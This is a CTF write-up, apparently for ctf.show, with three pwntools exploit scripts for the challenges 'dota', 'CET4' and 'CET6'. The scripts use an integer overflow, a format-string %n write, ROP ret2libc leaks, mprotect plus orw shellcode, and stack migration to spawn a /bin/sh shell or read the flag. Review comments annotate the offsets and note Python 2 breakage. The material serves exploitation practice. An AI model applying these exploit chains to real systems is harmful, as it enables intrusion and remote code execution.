dota:
考点:
- 整数溢出
- ret2libc
exp:
from pwn import *
# p = process("./dota")
# --- dota: 考点 per the writeup = 整数溢出 (integer overflow) + ret2libc ---
# NOTE(review): this is a Python 2 era pwntools script -- str literals are
# concatenated with p64() output and str is passed to recvuntil().  Under
# Python 3 pwntools p64() returns bytes and those lines raise TypeError.
# Remote instance named in the writeup; the commented-out process() line
# above is the local equivalent.
p = remote("pwn.challenge.ctf.show",28127)
# Challenge binary; only used for the puts@got lookup further down.
e = ELF("./dota")
# Short receive timeout so a mis-counted prompt fails fast instead of hanging.
p.timeout = 0.5
# Echo every send/recv -- the separator counting below is easy to get off by one.
context.log_level = 'debug'
libc = e.libc
# NOTE(review): `libc` is never used in this script.  Every libc offset below
# (0x0809c0, 0x04f440, 0x1b3e9a) is hard-coded, so it has to match the libc of
# the remote instance rather than whatever e.libc resolves to on this machine.

# Round 1: skip the banner separators and answer the first prompt with "dota".
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.sendline("dota")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
# 2147483648 == 2**31, i.e. INT_MAX + 1.  The writeup lists integer overflow
# as the bug, so presumably this value wraps a signed 32-bit check in the
# binary -- TODO confirm by reading the comparison.
p.sendline('2147483648')
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvline()
# The program prints an address on a line of its own; it is parsed as hex
# two lines below.
stack_addr = p.recvline()
log.success(stack_addr)
# Format-string write: %25c emits 25 bytes and %9$n stores that count through
# the pointer taken as printf argument 9 -- assumed to be the p64(stack_addr)
# appended here (TODO confirm the argument index against the stack layout).
# Why the binary wants the value 25 is not stated in the writeup.
p.sendline("%25c%9$n"+p64(int(stack_addr,16)))
p.recvline()
# Stack overflow: 0x88 bytes of padding, presumably up to the saved return
# address (the offset comes from the writeup, it is not derived here).
pl1 = "a"*(0x88)
pop_rdi = 0x4009b3
# NOTE(review): pop_rsi is defined but never used in this script.
pop_rsi = 0x4009b1
puts_got = e.got["puts"]
# Chain: pop rdi <- puts@got, then 0x4005e0 and 0x400812, which the writeup
# does not name.  Since a libc pointer is read back right after, they are
# presumably a puts call followed by a return into the program's main loop
# -- TODO confirm against the binary.
pl1 += p64(pop_rdi) + p64(puts_got)+p64(0x4005e0) + p64(0x400812)
p.sendline(pl1)
# Leak parsing: keep the 6 low bytes ending in 0x7f, zero-pad to 8, unpack.
puts_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
# Hard-coded offset of puts inside the target libc.
libc_base = puts_addr - 0x0809c0
log.success(hex(puts_addr))

# Round 2: the program was re-entered, so repeat the same prompt handling,
# the same overflow value and the same %n write before the final chain.
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.sendline("dota")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.sendline('2147483648')
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvline()
stack_addr = p.recvline()
log.success(stack_addr)
p.sendline("%25c%9$n"+p64(int(stack_addr,16)))
p.recvline()
# Hard-coded libc offsets; the names suggest system() and a "/bin/sh" string
# -- TODO confirm they match the remote libc version.
# NOTE(review): `sys` shadows the stdlib module name.
sys = libc_base + 0x04f440
sh = libc_base + 0x1b3e9a
# Final chain: 0X4005CE is not named in the writeup (TODO confirm what it
# does), then pop rdi <- sh and return into sys.
pl2 = "a"*(0x88)+p64(0X4005CE) + p64(pop_rdi) + p64(sh) + p64(sys)
p.sendline(pl2)
p.interactive()
CET4:
mprotect 函数解析
- 开沙箱 ret2libc + orw
exp:
from pwn import *
# --- CET4: mprotect + ret2libc + orw shellcode, per the writeup's headings ---
# NOTE(review): Python 2 era pwntools -- str literals are concatenated with
# p64() output and str is passed to recvuntil(); under Python 3 pwntools
# p64() returns bytes and those lines raise TypeError.
p = process("./CET4")
e = ELF("./CET4")
context.log_level = 'debug'
# libc resolved from the binary; supplies the puts/mprotect/read symbols below.
libc = e.libc
# Required by shellcraft/asm at the end so the shellcode is built for x86-64.
context.arch ="amd64"
puts_plt = e.plt["puts"]
puts_got = e.got["puts"]
pop_rdi =0x4013d3
# NOTE(review): pop_rsi_r15 and bss are defined but never used -- the chains
# below write 0x404000 as a literal instead of `bss`, and use the libc
# pop-rsi gadget instead of pop_rsi_r15.
pop_rsi_r15 = 0x4013d1
bss = 0x404000
main = 0x401290
# Round 1: 4-byte name, then a 0x48-byte overflow that prints puts@got via
# puts@plt and returns to main so the program can be driven again.
p.recvuntil("your name:\n")
p.send("a"*(0x4))
p.recvuntil("QAQ:How was your test???")
pl1 = "a"*(0x48) + p64(pop_rdi)+p64(puts_got) + p64(puts_plt) + p64(main)
p.send(pl1)
# Leak parsing: keep the 6 low bytes ending in 0x7f, zero-pad to 8, unpack.
puts_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
log.success(hex(puts_addr))
libc_base = puts_addr - libc.sym["puts"]
protect = libc_base + libc.sym["mprotect"]
# Gadget offsets inside libc are hard-coded, unlike the symbols above, so
# they must match the libc that e.libc resolved to -- TODO re-derive them if
# the libc changes.
pop_rdx = 0x1b92 +libc_base
pop_rsi = 0x202f8 + libc_base
# Round 2: mprotect(0x404000, 0x1000, 7).  7 == PROT_READ|PROT_WRITE|PROT_EXEC,
# so the page the script calls `bss` becomes executable.  This is the call a
# W^X / seccomp policy that refuses PROT_EXEC on data pages would deny.
p.recvuntil("your name:\n")
p.send("a"*(0x4))
p.recvuntil("QAQ:How was your test???")
pl2 = "a"*(0x48) + p64(pop_rdi) + p64(0x404000) + p64(pop_rsi) + p64(0x1000) + p64(pop_rdx)+ p64(7)+p64(protect) + p64(main)
# gdb.attach(p,"b *0x4013d3")
p.send(pl2)
read=libc_base+libc.sym['read']
# Round 3: read(0, 0x404600, 0x500) into the now-RWX page, then return
# straight into 0x404600 so whatever is sent next is executed.
p.recvuntil("your name:\n")
p.send("a"*(0x4))
p.recvuntil("QAQ:How was your test???")
pl3 = "a"*(0x48) + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x404600) + p64(pop_rdx) + p64(0x500) + p64(read) + p64(0x404600)
# gdb.attach(p,"b *0x4013d3")
p.send(pl3)
# orw shellcode: open("./flag"), read 0x50 bytes from fd 3 into 0x404900
# (also inside the mprotect'd page), write them to stdout.  fd 3 assumes no
# other descriptor is open when open() returns -- TODO confirm.  The 开沙箱
# heading suggests a seccomp filter forbids execve, which would explain why
# only open/read/write are used -- TODO confirm the filter rules.
code = shellcraft.open("./flag")
code += shellcraft.read(3, 0x404900, 0x50)
code += shellcraft.write(1, 0x404900, 0x50)
shellcode = asm(code)
p.send(shellcode)
p.interactive()
CET6:
- 栈迁移+汇编调试
exp:
from pwn import *
# --- CET6: 栈迁移 (stack migration) + ret2libc, per the writeup's heading ---
# NOTE(review): Python 2 era pwntools -- str literals are concatenated with
# p64() output, and `.next()` is called on the search() generator.  Under
# Python 3 these raise TypeError / AttributeError (next(...) would be needed).
p = process("./CET6")
e = ELF("./CET6")
context.log_level = 'debug'
libc = e.libc
context.arch ="amd64"
pop_rdi = 0x4012f3
p.recvuntil("your name:\n")
p.sendline("a"*(4))
p.recvuntil("QAQ:How was your test???\n")
# Migration stage 1: 0x40 bytes of padding, then 0x404500 and a return to
# 0x4011ae.  The 栈迁移 heading implies the 8 bytes after the padding land on
# the saved rbp; 0x4011ae is not named in the writeup and presumably
# re-enters the routine that reads this buffer, so the next input is placed
# relative to the new rbp -- TODO confirm in a debugger (see the
# commented-out gdb.attach below).
pl1 = "a"*(0x40) + p64(0x404500)
pl1 += p64(0x4011ae)
p.send(pl1)
# Stage 2: same shape, rbp candidate moved to 0x404540.
pl2 = "a"*(0x40) + p64(0x404540)
pl2+= p64(0x4011ae)
# gdb.attach(p,'b *0x4011ae')
p.send(pl2)
puts_got = e.got["puts"]
puts_plt = e.plt["puts"]
# Stage 3: only 8 bytes of padding now (the frame is presumably in the
# migrated region), then print puts@got via puts@plt and return to 0x4011ae
# once more.
pl3 = "a"*(0x8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x4011ae)
p.send(pl3)
# Leak: keep the 6 low bytes ending in 0x7f, zero-pad, unpack, subtract the
# puts offset taken from the libc symbol table.
libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-libc.sym['puts']
success('libc_base:'+hex(libc_base))
# "/bin/sh" string and system() located through libc's own tables rather
# than hard-coded offsets, so this part follows the resolved libc.
sh=libc_base+libc.search('/bin/sh\x00').next()
system=libc_base+libc.sym['system']
# Final chain: 0x20 padding, pop rdi <- sh, return into system.
p.send('a'*0x20+p64(pop_rdi)+p64(sh)+p64(system))
p.interactive()